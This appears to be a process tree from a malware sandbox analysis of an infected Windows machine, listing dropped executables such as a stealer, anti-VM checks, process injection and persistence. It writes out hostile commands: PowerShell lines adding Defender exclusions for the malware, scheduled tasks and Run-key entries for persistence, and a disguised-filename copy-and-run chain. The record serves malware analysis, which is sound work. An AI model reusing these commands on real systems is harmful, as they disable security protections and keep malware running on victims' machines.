C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1220
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:1448
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  - Executes dropped EXE
  PID:5556
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:5168
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  - Executes dropped EXE
  PID:7108
- C:\ProgramData\cmd.exe
  C:\ProgramData\cmd.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:5992
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6156
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6016
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB056.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5712
- - C:\ProgramData\cmd.exe
    "C:\ProgramData\cmd.exe"
    3⤵
    - Executes dropped EXE
    PID:6540
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4940
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  - Executes dropped EXE
  PID:5588
- C:\ProgramData\cmd.exe
  C:\ProgramData\cmd.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6712
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6156
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4DDE.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4108
- - C:\ProgramData\cmd.exe
    "C:\ProgramData\cmd.exe"
    3⤵
    - Executes dropped EXE
    PID:3024
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:6124
- C:\ProgramData\jmpsv\jxfk.exe
  C:\ProgramData\jmpsv\jxfk.exe start2
  2⤵
  PID:5980
- C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
  C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
  2⤵
  PID:6296
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1920
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:4956
- C:\ProgramData\cmd.exe
  C:\ProgramData\cmd.exe
  2⤵
  PID:6636
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData\cmd.exe"
    3⤵
    PID:5816
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\ProgramData\cmd.exe
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3544
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:3796
- C:\ProgramData\jmpsv\jxfk.exe
  C:\ProgramData\jmpsv\jxfk.exe start2
  2⤵
  PID:7076
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:6864
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:3408
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:5612
- C:\Users\Admin\AppData\Roaming\yar.exe
  C:\Users\Admin\AppData\Roaming\yar.exe
  2⤵
  PID:5992
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:6292
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:7092
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:3408
- C:\Users\Admin\AppData\Roaming\yar.exe
  C:\Users\Admin\AppData\Roaming\yar.exe
  2⤵
  PID:6332
- C:\Users\Admin\AppData\Roaming\yar.exe
  C:\Users\Admin\AppData\Roaming\yar.exe
  2⤵
  PID:7032
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:5264
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:6148
- C:\Users\Admin\Windows Upgrade\wupgrdsv.exe
  "C:\Users\Admin\Windows Upgrade\wupgrdsv.exe"
  2⤵
  PID:6072
- C:\Users\Admin\AppData\Roaming\yar.exe
  C:\Users\Admin\AppData\Roaming\yar.exe
  2⤵
  PID:5336
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:5464
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:7032
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:4780
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:6116
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:5168
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:5648
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:1004
- C:\Users\Admin\AppData\Roaming\yar.exe
  C:\Users\Admin\AppData\Roaming\yar.exe
  2⤵
  PID:5572
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:5764
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:2096
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    PID:9080
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn ERGVRDVMSK /tr C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      4⤵
      PID:5316
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:6700
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:4900
- C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  2⤵
  PID:7392
- C:\Users\Admin\AppData\Roaming\yar.exe
  C:\Users\Admin\AppData\Roaming\yar.exe
  2⤵
  PID:8184
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:7980
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:7632
- C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
  2⤵
  PID:3636
- - C:\Windows\svchost.com
    "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\100000~1\35CADF~1.EXE"
    3⤵
    PID:4900
  - - C:\Users\Admin\AppData\Local\Temp\100000~1\35CADF~1.EXE
      C:\Users\Admin\AppData\Local\Temp\100000~1\35CADF~1.EXE
      4⤵
      PID:2128
- C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
  2⤵
  PID:6948
- C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
  2⤵
  PID:7828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1544
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3068

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1720

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1860

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2080

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2260

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2528

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2400

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1756

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3320
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4308
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:756
- - C:\Users\Admin\AppData\Local\Temp\Files\w.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\w.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\s.exe
      "C:\Users\Admin\AppData\Local\Temp\s.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      PID:2452
- - C:\Users\Admin\AppData\Local\Temp\Files\Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3924
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /c ping 127.0.0.1 -n 41 > nul && copy "C:\Users\Admin\AppData\Local\Temp\Files\Google%20Chrome%20Sandbox%20Final.%e2%80%aefdp.exe" "C:\Program Files (x86)\Google Chrome sandbox.exe.exe" && ping 127.0.0.1 -n 41 > nul && "C:\Program Files (x86)\Google Chrome sandbox.exe.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2320
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 41
        5⤵
        Runs ping.exe
        
        PID:3636
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 41
        5⤵
        Runs ping.exe
        
        PID:3348
- - C:\Users\Admin\AppData\Local\Temp\Files\nircmd.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\nircmd.exe"
    3⤵
    - Executes dropped EXE
    PID:4752
- - C:\Users\Admin\AppData\Local\Temp\Files\luma22222.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\luma22222.exe"
    3⤵
    - Executes dropped EXE
    PID:4264
- - C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Opolis.exe"
    3⤵
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of FindShellTrayWindow
    PID:3808
  - - C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\OSM-Client.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2732
- - C:\Users\Admin\AppData\Local\Temp\Files\xcdaxfszx.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\xcdaxfszx.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2508
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1104
- - C:\Users\Admin\AppData\Local\Temp\Files\drivermanager.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\drivermanager.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:560
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:3336
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4936
  - - C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      PID:3908
    - - C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4656
      - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        
        C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
        6⤵
        
        PID:2036
    - - C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:3984
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
        6⤵
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4032
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 1280
        7⤵
        Program crash
        
        PID:3828
    - - C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe"
        5⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:4588
      - C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
        6⤵
        Executes dropped EXE
        
        PID:1592
        
        C:\Users\Admin\AppData\Local\Temp\1000030001\1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000030001\1.exe"
        7⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        
        PID:3628
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3628 -s 492
        8⤵
        Program crash
        
        PID:712
    - - C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1064
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:428
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1116
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1004
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 332
        6⤵
        Program crash
        
        PID:3936
    - - C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"
        5⤵
        Executes dropped EXE
        
        PID:1636
    - - C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:2480
    - - C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5040
- - C:\Users\Admin\AppData\Local\Temp\Files\newfile_setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\newfile_setup.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2956
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3008
- - C:\Users\Admin\AppData\Local\Temp\Files\vi.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\vi.exe"
    3⤵
    - Executes dropped EXE
    PID:2888
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2888 -s 1724
      4⤵
      Program crash
      PID:1868
- - C:\Users\Admin\AppData\Local\Temp\Files\hv.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\hv.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:1916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:3900
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2424
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists';New-ItemProperty-Path'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'-Name'LibraryApp_for_translators_and_linguists' -Value '"C:\Users\Admin\AppData\Local\LibraryApp_for_translators_and_linguists\LibraryApp_for_translators_and_linguists.exe"' -PropertyType 'String'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2044
- - C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\M5traider.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    PID:4608
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      4⤵
      PID:1356
- - C:\Users\Admin\AppData\Local\Temp\Files\newbild.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\newbild.exe"
    3⤵
    - Executes dropped EXE
    PID:3032
- - C:\Users\Admin\AppData\Local\Temp\Files\IerLRtXpEcMnUjz.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\IerLRtXpEcMnUjz.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:2776
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\IerLRtXpEcMnUjz.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4908
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\DzmQEVPXhX.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3328
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DzmQEVPXhX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp3956.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3256
  - - C:\Users\Admin\AppData\Local\Temp\Files\IerLRtXpEcMnUjz.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\IerLRtXpEcMnUjz.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Suspicious behavior: AddClipboardFormatListener
